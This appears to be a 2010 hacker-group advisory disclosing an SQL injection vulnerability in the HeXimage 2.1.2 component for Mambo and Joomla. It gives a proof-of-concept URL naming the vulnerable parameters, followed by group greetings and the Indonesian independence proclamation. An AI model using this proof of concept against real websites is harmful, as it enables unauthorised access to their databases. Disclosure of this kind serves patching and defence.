[o]========================================================[o] [!] Mambo & Joomla! Component HeXimage SQL Injection Vulnerability [!] Author : Don Tukulesto (root@indonesiancoder.com) [!] Homepage : http://indonesiancoder.com [!] Date : Tue, August 17, 2010 [o]========================================================[o] [ Software Information ] [>] Vendor : http://www.joomlafrance.org [>] Download : http://www.joomlafrance.org/telecharger/startdown/HeXimage.html [>] Version : 2.1.2 [>] License : GNU General Public License [>] Type : Non-Commercial ( open source CMS ) [>] Method : SQL Injection ======================================================== [ Proof of Concept ] http://[site]/index.php?option=com_heximage&task=selector&albumselected=INDONESIANCODER&pID=31337 ======================================================== [ We are ] [>] Indonesian Coder Team - AntiSecurity - ServerIsDown - SurabayaHackerLink [>] M364TR0N | DEESSAINT | Cyb3r_tr0n | Gonzhack | kaMtiEz | El N4ck0 | ibl13Z | arianom [>] elv1n4 | YaDoY666 | ./Jack- | xshadow | M3NW5 | Pathloader | Mboys | Contrex | amxku [>] xnitro @xtremenitro.org | DraCoola | Senot | ran | CherCut & bocah|duduL | Ghambass | CS-31 [>] James Brown & Todd @packetstormsecurity.org | Maksymilian & sp3x @securityreason.com [ Notes ] [>] Proclamation of Indonesian Independence PROCLAMATION WE THE PEOPLE OF INDONESIA HEREBY DECLARE THE INDEPENDENCE OF INDONESIA. MATTERS WHICH CONCERN THE TRANSFER OF POWER AND OTHER THINGS WILL BE EXECUTED BY CAREFUL MEANS AND IN THE SHORTEST POSSIBLE TIME. DJAKARTA, AUGUST 17, 1945 IN THE NAME OF THE PEOPLE OF INDONESIA SOEKARNO Ñ HATTA